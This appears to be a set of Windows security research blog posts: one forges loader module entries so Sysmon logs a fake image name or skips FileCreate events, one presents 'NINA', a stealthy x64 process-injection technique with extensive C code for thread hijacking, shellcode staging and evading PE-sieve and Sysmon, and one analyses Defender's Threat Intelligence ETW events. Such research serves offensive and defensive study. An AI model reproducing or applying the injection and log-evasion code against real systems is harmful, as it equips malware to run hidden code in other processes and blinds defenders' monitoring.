Since this depends on user-mode data, it can be falsified just like the PEB's image file name. An interesting discovery is that the module list is iterated until either the end of the list is reached or the enumeration hits 512 entries, whichever comes first:

List enumeration loop condition

This means that we don't have to modify the original module's entry, we can append a fake one.

PLIST_ENTRY MemList = Peb->Ldr->InMemoryOrderModuleList.Flink;
PLDR_DATA_TABLE_ENTRY SelfTableEntry = NULL;

for (ULONG_PTR i = 0; MemList != &Peb->Ldr->InMemoryOrderModuleList; i++) {
	PLDR_DATA_TABLE_ENTRY Ent = CONTAINING_RECORD(
		MemList,
		LDR_DATA_TABLE_ENTRY,
		InMemoryOrderLinks
	);
    
	if (!_wcsicmp(Ent->FullDllName.Buffer, argv[0])) {
		SelfTableEntry = Ent;
	}

	MemList = MemList->Flink;
}

LDR_DATA_TABLE_ENTRY FakeTableEntry = { 0 };
if (SelfTableEntry) {
	//
	// Copy own module's image size and DLL base
	// to trick Sysmon.
	//
	FakeTableEntry.DllBase = SelfTableEntry->DllBase;
	//
	// SizeOfImage.
	//
	FakeTableEntry.Reserved3[1] = SelfTableEntry->Reserved3[1];
	//
	// Fake the image name.
	//
	FakeTableEntry.FullDllName = FakeImagePathName;

	//
	// Append to module list. After the loop above, MemList points
	// at the list head, so MemList->Blink is the current tail.
	//
	FakeTableEntry.InMemoryOrderLinks.Blink = MemList->Blink;
	FakeTableEntry.InMemoryOrderLinks.Flink = &Peb->Ldr->InMemoryOrderModuleList;
	MemList->Blink->Flink = &FakeTableEntry.InMemoryOrderLinks;
	Peb->Ldr->InMemoryOrderModuleList.Blink = &FakeTableEntry.InMemoryOrderLinks;
}

Appending fake LDR_DATA_TABLE_ENTRY module entry
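
To show the idea without any Windows structures, here is a portable model of the bounded list walk and the append. It is a sketch under assumptions: the range test is treated as half-open, and the walk keeps the last matching entry rather than stopping at the first. I chose the latter only because it is consistent with the appended entry being the one that ends up in the log; it is not taken from the disassembly. All of the names are made up.

```c
#include <stddef.h>
#include <stdint.h>

#define MAX_MODULES_WALKED 512

typedef struct module_entry {
    struct module_entry *flink;
    struct module_entry *blink;
    uint64_t dll_base;
    uint32_t size_of_image;
    const char *name;
} module_entry;

/* Link entry in as the new tail of the circular list rooted at head. */
void append_module(module_entry *head, module_entry *entry)
{
    entry->blink = head->blink;
    entry->flink = head;
    head->blink->flink = entry;
    head->blink = entry;
}

/* Walk at most 512 entries and return the module containing address. */
const module_entry *find_module(const module_entry *head, uint64_t address)
{
    const module_entry *match = NULL;
    const module_entry *cur = head->flink;
    size_t walked = 0;

    while (cur != head && walked < MAX_MODULES_WALKED) {
        if (address >= cur->dll_base &&
            address < cur->dll_base + cur->size_of_image) {
            match = cur; /* Assumption: a later entry overrides an earlier one. */
        }
        cur = cur->flink;
        walked++;
    }

    return match;
}
```

In this model, appending a second entry with the same base and size as the real module changes the lookup result without touching the real entry.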

The resulting log now reflects the fake process name in the CallTrace value:

Fake image name in CallTrace

Bypassing Logging

Where events have exclusions based on image names, it's possible to forge the image name using the above technique and stop Sysmon from logging the event entirely. Let's look at an example.

SwiftOnSecurity's Sysmon configuration file contains the following inclusions for the FileCreate event:

FileCreate event inclusion triggers

An example trigger here would be creating a file in the Downloads directory like so:

Creating a file in the Downloads directory logged by Sysmon

Now let's look at the exclusions for this event:

FileCreate event exclusions

If our image name is C:\Windows\system32\smss.exe, Sysmon would not log the event. Can we use this to stop Sysmon from logging?

Bypassing Sysmon's FileCreate event with faked image

We can see that Sysmon doesn't log the FileCreate event. Success!

Bonus Process Access Method

One of the sections in Bill Demirkapi's Trend Micro post discusses the EPROCESS ImageFileName Offset. If we have a look at the disassembly after the GetProcessInfo call from the ObRegisterCallbacks' post operation, we can see the GetProcessImageFileNameByHandle function:

GetProcessImageFileNameByHandle fallback method

This function is only triggered when GetProcessInfo fails. Let's see how it retrieves the image file name:

GetProcessImageFileNameByHandle function

The blue highlights the CurrentProcessImageFileName parameter which can be seen to receive a UNICODE_STRING pool buffer at the bottom. In the red, we can see that the global variable g_ProcessNameOffset is added onto the PEPROCESS object returned by ObReferenceObjectByHandle. If we trace the origin of g_ProcessNameOffset, we get the following:

g_ProcessNameOffset origin

This essentially translates to:

PEPROCESS Process = IoGetCurrentProcess();
ULONG g_ProcessNameOffset;

//
// Scan the current process' EPROCESS for the "System" image name.
//
for (g_ProcessNameOffset = 0; g_ProcessNameOffset < 0x3000; g_ProcessNameOffset++) {
    if (!strncmp("System", (PCHAR)Process + g_ProcessNameOffset, strlen("System"))) {
        break;
    }
}
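
The same scan can be tried out in usermode against a plain byte buffer. This is a sketch of the idea only: find_name_offset is a made-up name, and unlike the loop above it also stops at the end of the buffer and reports a miss explicitly.

```c
#include <stddef.h>
#include <string.h>

#define SCAN_LIMIT 0x3000

/* Return the offset of "System" within object, or -1 if it isn't found. */
long find_name_offset(const unsigned char *object, size_t object_size)
{
    static const char needle[] = "System";
    const size_t needle_len = sizeof(needle) - 1;
    size_t limit = object_size < SCAN_LIMIT ? object_size : SCAN_LIMIT;

    for (size_t off = 0; off + needle_len <= limit; off++) {
        if (memcmp(object + off, needle, needle_len) == 0)
            return (long)off;
    }

    return -1;
}
```

Planting the string at some offset in a zeroed buffer and scanning it returns that offset, which is all the driver relies on to locate the name in other processes' EPROCESS objects.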

Of course, there is a proper API to retrieve the image file name (ZwQueryInformationProcess with ProcessImageFileName). So why does this exist? @analyzev notes on this Twitter thread that this function dates back to this RegMon source and it matches exactly with Sysmon's.

I believe this method of retrieving the image name can produce false results. If the file on disk is renamed or moved, the changes may not be reflected in the EPROCESS structure.

Conclusion

It's interesting to see critical data being retrieved in an unreliable and user-controlled way. I'm curious as to what impact this may have from a detection and forensics point of view. Events may slip by unnoticed or certain alerts may not fire if rules do not match where image names are used. Of course Sysmon shouldn't be the only source of logging and some of the affected events are not entirely untrustworthy so the overall effect may not be so concerning. But something to think about...

NINA: x64 Process Injection

NtRaiseHardError — Thu, 04 Jun 2020 07:50:47 GMT

In this post, I will be detailing an experimental process injection technique with a hard restriction on the usage of common and "dangerous" functions, i.e. WriteProcessMemory, VirtualAllocEx, VirtualProtectEx, CreateRemoteThread, NtCreateThreadEx, QueueUserAPC, and NtQueueApcThread. I've called this technique NINA: No Injection, No Allocation. The aim of this technique is to be stealthy (obviously) by reducing the number of suspicious calls without the need for complex ROP chains. The PoC can be found here: https://github.com/NtRaiseHardError/NINA.

Tested environments:

Windows 10 x64 version 2004
Windows 10 x64 version 1903

Implementation: No Injection

Let's start with a solution that removes the need for data injection.

The most basic process injection requires a few basic ingredients:

A target address to contain the payload,
Passing the payload to the target process, and
An execution operation to execute the payload

To keep the focus on the No Injection section, I will use the classic VirtualAllocEx to allocate memory in the remote process. It is important to keep pages from having write and execute permissions at the same time so RW should be set initially and then re-protected with RX after the data has been written. Since I will discuss the No Allocation method later, we can set the pages to RWX for now to keep things simple.

If we restrict ourselves from using data injection, it means that the malicious process does not use WriteProcessMemory to directly transfer data from itself into the target process. To handle this, I was inspired by the reverse ReadProcessMemory documented by Deep Instinct's (complex) "Inject Me" process injection technique (shared with me by @slaeryan). There exist other methods of passing data into a process: using GlobalGetAtomName (from the Atom Bombing technique), and passing data through either the command line options or environment variables (with the CreateProcess call to spawn a target process). However, these three methods have one small limitation in that the payload must not contain NULL characters. Ghost Writing is also an option but it requires a complex ROP chain.

To gain execution, I've opted for a thread hijacking style technique using the crucial SetThreadContext function since we cannot use CreateRemoteThread, NtCreateThreadEx, QueueUserAPC, and NtQueueApcThread.

Here is the procedure:

CreateProcess to spawn a target process,
VirtualAllocEx to allocate memory for the payload and a stack,
SetThreadContext to force the target process to execute ReadProcessMemory,
SetThreadContext to execute the payload.

CreateProcess

There are some considerations that should be taken when using this injection technique. The first comes from the CreateProcess call. Although this technique does not rely on CreateProcess, there are some reasons why it may be advantageous to use this instead of something like OpenProcess or OpenThread. One reason is that there is no remote (external) process access to obtain handles which could otherwise be detected by monitoring tools, such as Sysmon, that use ObRegisterCallbacks. Another reason is that it allows for the two aforementioned data injection methods using the command line and environment variables. If you're creating the process, you could also leverage blockdlls and ACG to defeat antivirus user-mode hooking.

VirtualAllocEx

Of course the target process needs to be able to house the payload but this technique also requires a stack. This will be made clear shortly.

ReadProcessMemory

To use this function in a reversed manner, we must consider two issues: passing argument five on the stack and using a valid process handle to our own malicious process. Let's look at the issue with the fifth argument first:

BOOL ReadProcessMemory(
  HANDLE  hProcess,
  LPCVOID lpBaseAddress,
  LPVOID  lpBuffer,
  SIZE_T  nSize,
  SIZE_T  *lpNumberOfBytesRead
);

ReadProcessMemory arguments

Using SetThreadContext only allows for the first four arguments on x64. If we read the description for lpNumberOfBytesRead, we can see that it's optional:

A pointer to a variable that receives the number of bytes transferred into the specified buffer. If lpNumberOfBytesRead is NULL, the parameter is ignored.

Luckily, if we use VirtualAllocEx to create pages, the function will zero them:

Reserves, commits, or changes the state of a region of memory within the virtual address space of a specified process. The function initializes the memory it allocates to zero.

Setting the stack to the zero-allocated pages will provide a valid fifth argument.
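To make the layout concrete, here is a minimal sketch that models the stack as ReadProcessMemory would see it on entry under the Microsoft x64 calling convention: the return address sits at RSP, the next 0x20 bytes are the shadow space for the four register arguments, and the fifth argument is read from RSP + 0x28. The buffer and the helper name read_fifth_arg are hypothetical stand-ins for the zeroed VirtualAllocEx region; nothing here touches a real process.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Offsets relative to RSP at function entry (Microsoft x64 calling convention). */
#define RET_SLOT_SIZE      0x08  /* return address */
#define SHADOW_SPACE_SIZE  0x20  /* home space for RCX, RDX, R8, R9 */
#define FIFTH_ARG_OFFSET   (RET_SLOT_SIZE + SHADOW_SPACE_SIZE)  /* 0x28 */

/* Read the 8-byte value a callee would see as its fifth argument.
 * `region` models the zeroed allocation and `rsp_offset` is where RSP points
 * inside it. Returns 0 on success, -1 if the slot falls outside the region. */
int read_fifth_arg(const uint8_t *region, size_t region_size,
                   size_t rsp_offset, uint64_t *out)
{
    assert(region != NULL && out != NULL);
    if (rsp_offset > region_size ||
        region_size - rsp_offset < FIFTH_ARG_OFFSET + sizeof(uint64_t))
        return -1;
    memcpy(out, region + rsp_offset + FIFTH_ARG_OFFSET, sizeof(uint64_t));
    return 0;
}
```

With a zero-filled region, any in-bounds RSP yields a fifth argument of 0, which ReadProcessMemory treats as a NULL lpNumberOfBytesRead.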

The second problem is the process handle passed to ReadProcessMemory. Because we're trying to get the target process to read our malicious process, we need to give it a handle to our process. This can be achieved using the DuplicateHandle function. It will be given our current process handle and return a handle which can be used by the target process.

SetThreadContext

SetThreadContext is a powerful and flexible function that allows reads, writes, and executes. But there is a known issue with using it to pass fastcall arguments: the volatile registers RCX, RDX, R8 and R9 cannot be reliably set to desired values. Consider the following code:

    // Get target process to read shellcode
    SetExecutionContext(
    	// Target thread
        &TargetThread,
        // Set RIP to read our shellcode
        _ReadProcessMemory,
        // RSP points to stack
        StackLocation,
        // RCX: Handle to our own process to read shellcode
        TargetProcess,
        // RDX: Address to read from
        &Shellcode,
        // R8: Buffer to store shellcode
        TargetBuffer,
        // R9: Size to read
        sizeof(Shellcode)
    );

Forcing target process to execute ReadProcessMemory

If we execute this code, we expect the volatile registers to hold their correct values when the target thread reaches ReadProcessMemory. However, this is not what happens in practice:

Incorrect volatile registers for ReadProcessMemory

For some unknown reason, the volatile registers are changed, which makes this technique unusable. RCX is not a valid handle to a process, RDX is zero and R9 is too big. I have discovered a method that allows the volatile registers to be set reliably: simply set RIP to an infinite jmp -2 loop before using SetThreadContext. Let's see it in action:

Infinite jmp -2 loop
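For reference, the jmp -2 gadget is the two-byte sequence EB FE (the same bytes the example shellcode in this post starts with). The sketch below only illustrates why that encoding spins in place: a short jump's displacement is signed and relative to the end of the instruction, so -2 lands back on the jump itself. The helper name short_jmp_target is made up for this example.

```c
#include <assert.h>
#include <stdint.h>

/* Opcode of the x86/x64 short relative jump (JMP rel8). */
#define JMP_REL8_OPCODE 0xEB

/* Compute where a 2-byte `JMP rel8` located at `address` transfers control.
 * The displacement byte is signed and relative to the next instruction. */
uint64_t short_jmp_target(uint64_t address, const uint8_t insn[2])
{
    assert(insn[0] == JMP_REL8_OPCODE);
    int8_t disp = (int8_t)insn[1];
    /* Sign-extend the displacement, then add it to the end of the instruction. */
    return address + 2 + (uint64_t)(int64_t)disp;
}
```

Feeding it EB FE at any address returns that same address, which is exactly the stall we want while SetThreadContext does its work.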

The infinite loop can be executed using SetThreadContext, then ReadProcessMemory can be called with the correct volatile registers:

Correct volatile registers for ReadProcessMemory

Now we need to handle the return. Note that we allocated and pivoted to our own stack. If we can use ReadProcessMemory to read the shellcode into the stack location at RSP, we can set the first 8 bytes of the shellcode so that it will ret back into itself. Here is an example:

BYTE Shellcode[] = {
	// Placeholder for ret from ReadProcessMemory to Shellcode + 8
	0xEF, 0xBE, 0xAD, 0xDE, 0xEF, 0xBE, 0xAD, 0xDE,
	// Shellcode starts here...
	0xEB, 0xFE, 0x01, 0x23, 0x45, 0x67, 0x89, 0xAA,
	0xBB, 0xCC, 0xDD, 0xEE, 0xFF, 0x90, 0x90, 0x90
};

Example shellcode

Stack and shellcode

RSP and R8 point to 000001F457C21000. The addresses going upwards will be used for the stack in the ReadProcessMemory call. The target buffer where the shellcode will be written is from R8 downwards. When ReadProcessMemory returns, it will use the first 8 bytes of the shellcode as the return address to 000001F457C21008 where the real shellcode starts:

ReadProcessMemory ret back into shellcode + 8
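The placeholder has to be filled in before the target reads the shellcode. A minimal sketch of that patching step, assuming the remote buffer address is already known to the injector: patch_return_slot is a hypothetical helper, not taken from the PoC.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define RET_SLOT_SIZE 8

/* Overwrite the 8-byte placeholder at the start of `shellcode` with the
 * address execution should return to: the remote buffer plus the slot size.
 * x64 is little-endian, so the least significant byte is stored first. */
uint64_t patch_return_slot(uint8_t *shellcode, size_t size, uint64_t remote_buffer)
{
    assert(shellcode != NULL && size > RET_SLOT_SIZE);
    uint64_t target = remote_buffer + RET_SLOT_SIZE;
    for (size_t i = 0; i < RET_SLOT_SIZE; i++)
        shellcode[i] = (uint8_t)(target >> (8 * i));
    return target;
}
```

For the buffer at 000001F457C21000 shown above, the first eight bytes become 08 10 C2 57 F4 01 00 00, so the ret at the end of ReadProcessMemory lands on 000001F457C21008.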

Implementation: No Allocation

Let's now discuss how we can improve by removing the need for VirtualAllocEx. This is a bit less trivial than the previous section because there are some initial issues that arise:

How will we set up the stack for ReadProcessMemory?
How will the shellcode be written and executed using ReadProcessMemory if there are no RWX sections?

But why should we need to allocate memory when it's already there for us to use? Keep in mind that if any existing pages in memory are affected, care needs to be taken to not overwrite any critical data if the original execution flow should be restored.

The Stack

If we cannot allocate memory for the stack, we can find an empty RW page to use. If there's a worry about the NULL fifth argument for ReadProcessMemory, that can be easily solved. If we don't want to overwrite potentially critical data, we can take advantage of section padding within possible RW pages that lie within the executable image. Of course, this assumes that there is padding available.

To locate RW pages within the executable image's memory range, we can locate the image's base address through the Process Environment Block (PEB), then use VirtualQueryEx to enumerate the range. This function will return information such as the protection and its size which can be used to find any existing RW pages and if they're appropriately sized for the shellcode.

    //
    // Get PEB.
    //
    NtQueryInformationProcess(
        ProcessHandle,
        ProcessBasicInformation,
        &ProcessBasicInfo,
        sizeof(PROCESS_BASIC_INFORMATION),
        &ReturnLength
    );
    
    //
    // Get image base.
    //
    ReadProcessMemory(
        ProcessHandle,
        ProcessBasicInfo.PebBaseAddress,
        &Peb,
        sizeof(PEB),
        NULL
    );
    ImageBaseAddress = Peb.Reserved3[1];
    
    //
    // Get DOS header.
    //
    ReadProcessMemory(
        ProcessHandle,
        ImageBaseAddress,
        &DosHeader,
        sizeof(IMAGE_DOS_HEADER),
        NULL
    );
    
    //
    // Get NT headers.
    //
    ReadProcessMemory(
        ProcessHandle,
        (LPBYTE)ImageBaseAddress + DosHeader.e_lfanew,
        &NtHeaders,
        sizeof(IMAGE_NT_HEADERS),
        NULL
    );
    
    //
    // Look for existing memory pages inside the executable image.
    //
    for (SIZE_T i = 0; i < NtHeaders.OptionalHeader.SizeOfImage; i += MemoryBasicInfo.RegionSize) {
        VirtualQueryEx(
            ProcessHandle,
            (LPBYTE)ImageBaseAddress + i,
            &MemoryBasicInfo,
            sizeof(MEMORY_BASIC_INFORMATION)
        );

        //
        // Search for a RW region to act as the stack.
        // Note: It's probably ideal to look for a RW section 
        // inside the executable image memory pages because
        // the padding of sections suits the fifth, optional
        // argument for ReadProcessMemory and WriteProcessMemory.
        //
        if (MemoryBasicInfo.Protect & PAGE_READWRITE) {
            //
            // Stack location in RW page starting at the bottom.
            //
        }
    }

Example code to query RW page for stack.

After locating the correct page, the position of the stack should be enumerated upwards from the bottom of the page (due to the nature of stacks) and a 0x0000000000000000 value should be found for ReadProcessMemory's fifth argument. This means that we need to make sure the stack offset is at least 0x28 from the bottom plus space for the shellcode.

                   +--------------+
                   |     ...      |
                   +--------------+ -0x30
    Should be 0 -> |     arg5     |
                   +--------------+ -0x28
                   |     arg4     |
                   +--------------+ -0x20
                   |     arg3     |
                   +--------------+ -0x18
                   |     arg2     |
                   +--------------+ -0x10
                   |     arg1     |
                   +--------------+ -0x8
                   |     ret      |
                   +--------------+ 0x0
                   |   Shellcode  |
Bottom of stack -> +--------------+

Stack offsets for ReadProcessMemory

Here is some code that demonstrates this:

    //
    // Allocate a stack to read a local copy.
    //
    Stack = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, AddressSize);

    //
    // Scan stack for NULL fifth arg
    //
    Success = ReadProcessMemory(
        ProcessHandle,
        Address,
        Stack,
        AddressSize,
        NULL
    );

    //
    // Enumerate from bottom (it's a stack).
    // Start from -5 * 8 => at least five arguments + shellcode.
    //
    for (SIZE_T i = AddressSize - 5 * sizeof(SIZE_T) - sizeof(Shellcode); i > 0; i -= sizeof(SIZE_T)) {
        ULONG_PTR* StackVal = (ULONG_PTR*)((LPBYTE)Stack + i);
        if (*StackVal == 0) {
            //
            // Get stack offset.
            //
            *StackOffset = i + 5 * sizeof(SIZE_T);
            break;
        }
    }

Example code to locate stack offset

In the case where there are no RW pages inside the executable's module, we can perform a fallback to write to the stack. To find a remote process' stack, we can do the following:

    NtQueryInformationThread(
        ThreadHandle,
        ThreadBasicInformation,
        &ThreadBasicInfo,
        sizeof(THREAD_BASIC_INFORMATION),
        &ReturnLength
    );

    ReadProcessMemory(
        ProcessHandle,
        ThreadBasicInfo.TebBaseAddress,
        &Tib,
        sizeof(NT_TIB),
        NULL
    );
    
    //
    // Get stack offset.
    //

Querying remote process's stack

The result inside Tib will contain the stack range addresses. With these values, we can use the code before to locate the appropriate offset starting from the bottom of the stack.

Writing the Shellcode

A main obstacle with no allocation is that we have to write the shellcode and then execute it in the same page. There is a way to do this without using VirtualProtectEx or complex ROP chains with this special function: WriteProcessMemory. Okay, I did say we couldn't use WriteProcessMemory to write the data from our process to the target but I didn't say that we couldn't force the target process to use it on itself. One of the hidden mechanisms inside WriteProcessMemory is that it will re-protect the target buffer's page accordingly to perform the write. Here we see that the target buffer's page is queried with NtQueryVirtualMemory:

WriteProcessMemory querying the target buffer's page

Then the page is de-protected for writing using NtProtectVirtualMemory:

WriteProcessMemory de-protecting the buffer's page before writing

If you've noticed, WriteProcessMemory modifies the shadow stack at the beginning of the function. In this case, we need to modify the shellcode to pad for the shadow stack:

BYTE Shellcode[] = {
	// Placeholder for ret from ReadProcessMemory to infinite jmp loop.
	0xEF, 0xBE, 0xAD, 0xDE, 0xEF, 0xBE, 0xAD, 0xDE,
	// Pad for shadow stack.
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	// Shellcode starts here at Shellcode + 0x30...
	0xEB, 0xFE, 0x01, 0x23, 0x45, 0x67, 0x89, 0xAA,
	0xBB, 0xCC, 0xDD, 0xEE, 0xFF, 0x90, 0x90, 0x90
};

Updated example shellcode
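The offsets in that array can be double-checked with a struct view of the staged buffer. This is only a sketch: the struct and field names are hypothetical, and reading the 0x28-byte pad as the 0x20-byte shadow space plus the fifth-argument slot is my interpretation of the layout rather than something taken from the PoC.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical view of the staged buffer copied by ReadProcessMemory. */
typedef struct StagedShellcode {
    uint64_t return_slot;  /* popped by ret; points at the jmp loop gadget */
    uint8_t  pad[0x28];    /* scratch area the called API may overwrite */
    uint8_t  payload[16];  /* real shellcode (example length only) */
} StagedShellcode;

#define PAYLOAD_OFFSET offsetof(StagedShellcode, payload)

/* Length of the real shellcode inside a staged buffer of `total` bytes. */
size_t payload_length(size_t total)
{
    assert(total >= PAYLOAD_OFFSET);
    return total - PAYLOAD_OFFSET;
}
```

The payload sits at offset 0x30 and the whole example buffer is 64 bytes, leaving 16 bytes of actual shellcode.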

Now we need to call both ReadProcessMemory and WriteProcessMemory sequentially. Going back to the return from ReadProcessMemory, we can simply jump back to the infinite jmp loop gadget to stall execution instead of the shellcode (it's in a non-executable page now):

ReadProcessMemory's ret address (00007FF6E13A3FC0) now contains the infinite jmp loop

This allows time for the malicious process to call another SetThreadContext to set RIP to WriteProcessMemory and reuse RSP from ReadProcessMemory. We can read the shellcode from the same location that was copied by ReadProcessMemory (+ 0x30 bytes to the actual shellcode) and target any page with execute permissions (again, assuming that there are RX sections).

    // Get target process to write the shellcode
    Success = SetExecutionContext(
        &ThreadHandle,
        // Set RIP to write our shellcode
        &_WriteProcessMemory,
        // RSP points to same stack offset
        &StackLocation,
        // RCX: Target process' own handle
        (HANDLE)-1,
        // RDX: Buffer to store shellcode
        ShellcodeLocation,
        // R8: Address to write from
        (LPBYTE)StackLocation + 0x30,
        // R9: size to write
        sizeof(Shellcode) - 0x30,
        NULL
    );

Forcing target process to execute WriteProcessMemory

When WriteProcessMemory returns, it should return into the infinite jmp loop again, allowing the malicious process to make the final call to SetThreadContext to execute the shellcode:

    // Execute the shellcodez
    Success = SetExecutionContext(
        &ThreadHandle,
        // Set RIP to execute shellcode
        &ShellcodeLocation,
        // RSP is optional
        NULL,
        // Arguments to shellcode are optional
        0,
        0,
        0,
        0,
        NULL
    );

SetThreadContext to execute the shellcode

Overall, the entire injection procedure is as follows:

SetThreadContext to an infinite jmp loop to allow SetThreadContext to reliably use volatile registers,
Locate a valid RW stack (or pseudo-stack) to host ReadProcessMemory and WriteProcessMemory arguments and the temporary shellcode,
Register a duplicated handle using DuplicateHandle for the target process to read the shellcode from the malicious process,
Call ReadProcessMemory using SetThreadContext to copy the shellcode,
Return into the infinite jmp loop after ReadProcessMemory,
Call WriteProcessMemory using SetThreadContext to copy the shellcode to an RX page,
Return into the infinite jmp loop after WriteProcessMemory,
Call the shellcode using SetThreadContext.

Detection Artifacts

To quickly test the stealth performance, I used two tools: hasherezade's PE-sieve and Sysinternals' Sysmon with SwiftOnSecurity's configuration. If there are any other defensive monitoring tools, I would love to see how well this technique holds up against them.

PE-sieve

Something I noticed while playing with PE-sieve is that if we inject the shellcode into the padding of the .text (or otherwise relevant) section, it will not be detected at all:

PE-sieve scan results on the target process

If the shellcode is too big to fit into the padding, perhaps another module might contain a bigger cave.

Sysmon Events

These are the expected results when using the CreateProcess call to spawn the target process instead of OpenProcess. One might expect the DuplicateHandle call to trigger a process handle event through ObRegisterCallbacks in Sysmon. This isn't the case because Sysmon does not follow the event if the handle access is performed by the process that owns that same handle. With AVs or EDRs, it may be different.

Sysmon events

Further Improvements

I wouldn't doubt that there may be some issues that I have overlooked since I really rushed this (side) project – I just had to explore this idea and see how far I could go. With regards to recovering the hijacked thread execution, it is possible and I have implemented it in the PoC, but it is dependent on the malicious process which might or might not be a good thing. ¯\_(ツ)_/¯

Limitations

One of the limitations of this technique is that the shellcode size is restricted due to the use of existing pages. The shellcode must be able to fit within the RW stack as well as the RX section. Although searching for modules with bigger sections is possible, it may not always be big enough. In this scenario, I would recommend using staging shellcode.

Conclusion

So it's possible to avoid using WriteProcessMemory, VirtualAllocEx, VirtualProtectEx, CreateRemoteThread, NtCreateThreadEx, QueueUserAPC, and NtQueueApcThread from the malicious process to inject into a remote process. The OpenProcess and OpenThread usage is still debatable because spawning a target process with CreateProcess isn't always an option. However, it does remove a lot of suspicious calls, which is the goal of this technique.

Since SetThreadContext is such a powerful primitive and crucial to this and many other stealthy techniques, will there be more focus on it? From what I can see, there is already native Windows logging available for it in Microsoft-Windows-Kernel-Audit-API-Calls ETW provider. I'm interested in seeing what the future will hold for process injection...

Introduction to Threat Intelligence ETW

NtRaiseHardError — Mon, 13 Apr 2020 10:19:58 GMT

Recently, the ETW functionality of Windows Defender was brought back to my attention after some discussion of existing methods of detecting malicious API calls and kernel callbacks (e.g. PsSetCreateThreadNotifyRoutine and ObRegisterCallbacks). I'd briefly heard of Defender's ability to detect malicious APC injection, which Souhail Hammou researched in the blog post Examining the user-mode APC injection sensor introduced in Windows 10 build 1809, which mentions the EtwTiLogQueueApcThread code. However, I just discovered that there was more than just APC injection. A recent blog post by B4rtik on Evading WinDefender ATP credential-theft: kernel version talks about attacking the ETW within the kernel by inline patching nt!EtwTiLogReadWriteVm to bypass detection of LSASS reads with NtReadVirtualMemory. It made me more curious as to how ETW worked so I had a look...

Note: The software versions at the time of writing are:

Microsoft Windows 10 Enterprise Evaluation Version 10.0.18363 Build 18363
ntoskrnl.exe Version 10.0.18362.592
Windows Defender Antimalware Client Version: 4.18.1911.3
Windows Defender Engine Version: 1.1.16700.3
Windows Defender Antivirus Version: 1.309.527.0
Windows Defender Antispyware Version: 1.309.527.0

Uncovering Threat Intelligence ETW Capabilities

Following B4rtik, I looked into MiReadVirtualMemory (which is just wrapped by NtReadVirtualMemory). As described, it eventually makes a call to EtwTiLogReadWriteVm:

EtwTiLogReadWriteVm called in MiReadVirtualMemory

Judging by the name, this is probably called by NtWriteVirtualMemory as well. If we take a look inside, there's a function call to EtwProviderEnabled which takes in the argument EtwThreatIntProvRegHandle:

EtwProviderEnabled called with EtwThreatIntProvRegHandle

So this handle, I assume, is associated with "threat intelligence" events. If we cross-reference this handle, we can see that it is used in multiple other locations, namely:

EtwTiLogInsertQueueUserApc
EtwTiLogAllocExecVm
EtwTiLogProtectExecVm
EtwTiLogReadWriteVm
EtwTiLogDeviceObjectLoadUnload
EtwTiLogSetContextThread
EtwTiLogMapExecView
EtwTiLogDriverObjectLoad
EtwTiLogDriverObjectUnLoad
EtwTiLogSuspendResumeProcess
EtwTiLogSuspendResumeThread

Cross-references to EtwThreatIntProvRegHandle

It's quite obvious from these function names that the threat intelligence provider seems to log event data on very commonly-used malicious API such as VirtualAlloc, WriteProcessMemory, SetThreadContext and ResumeThread which are the bread and butter of process hollowing.

There is also a reference to EtwpInitialize which is where the handle is initialised:

EtwThreatIntProvRegHandle initialisation

EtwThreatIntProviderGuid is defined as such:

EtwThreatIntProviderGuid GUID value

We can verify that the Microsoft-Windows-Threat-Intelligence provider exists using logman on the command line:

logman showing Microsoft-Windows-Threat-Intelligence provider

I'm assuming that, theoretically, all of the usermode API derived from the cross-references of the EtwThreatIntProvRegHandle handle can be detected in real time by defensive tools subscribed to the event notifications.

Event Descriptors

There are different types of descriptors for each type of event "capability". If we take a quick look at the code after the call to EtwProviderEnabled in EtwTiLogReadWriteVm, we can see references to symbols like THREATINT_WRITEVM_REMOTE:

Call to EtwEventEnabled with different event descriptors

If we cross-reference one of these, we'll find the entire list of descriptors:

Threat Intelligence event descriptors

The EtwEventEnabled function determines if a certain event is enabled for logging on the associated provider handle. Brief analysis of the function, with the EtwThreatIntProvRegHandle static, shows that one of the key factors in deciding which event descriptor is logged is the bitmask of both the handle and the event descriptor's _EVENT_DESCRIPTOR.Keyword value. If the bitwise AND of these two values is not 0, the event will be logged.

The handle's value is a consistent 0x00000000`1c085445 (across reboots) and the event descriptor's Keyword is detailed in the Threat Intelligence array shown above. If we & the handle's value and each of the event descriptor's bitmask values, we can see which are logged and which aren't (if I got this right):

THREATINT_MAPVIEW_LOCAL_KERNEL_CALLER: false
THREATINT_PROTECTVM_LOCAL_KERNEL_CALLER: false
THREATINT_ALLOCVM_LOCAL_KERNEL_CALLER: false
THREATINT_SETTHREADCONTEXT_REMOTE_KERNEL_CALLER: false
THREATINT_QUEUEUSERAPC_REMOTE_KERNEL_CALLER: false
THREATINT_MAPVIEW_REMOTE_KERNEL_CALLER: false
THREATINT_PROTECTVM_REMOTE_KERNEL_CALLER: false
THREATINT_ALLOCVM_REMOTE_KERNEL_CALLER: false
THREATINT_THAW_PROCESS: false
THREATINT_FREEZE_PROCESS: false
THREATINT_RESUME_PROCESS: false
THREATINT_SUSPEND_PROCESS: false
THREATINT_RESUME_THREAD: false
THREATINT_SUSPEND_THREAD: false
THREATINT_WRITEVM_REMOTE: true
THREATINT_READVM_REMOTE: false
THREATINT_WRITEVM_LOCAL: false
THREATINT_READVM_LOCAL: false
THREATINT_MAPVIEW_LOCAL: false
THREATINT_PROTECTVM_LOCAL: false
THREATINT_ALLOCVM_LOCAL: true
THREATINT_SETTHREADCONTEXT_REMOTE: true
THREATINT_QUEUEUSERAPC_REMOTE: true
THREATINT_MAPVIEW_REMOTE: true
THREATINT_PROTECTVM_REMOTE: true
THREATINT_ALLOCVM_REMOTE: true

Logging status of threat intelligence event descriptors
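The bitmask test behind that list can be sketched as follows. It is a simplified model that only covers the keyword comparison described above; the real EtwEventEnabled does more than this. The mask is the value observed in this post, while the single-bit keywords in the usage note are made-up placeholders and not the actual descriptor keywords.
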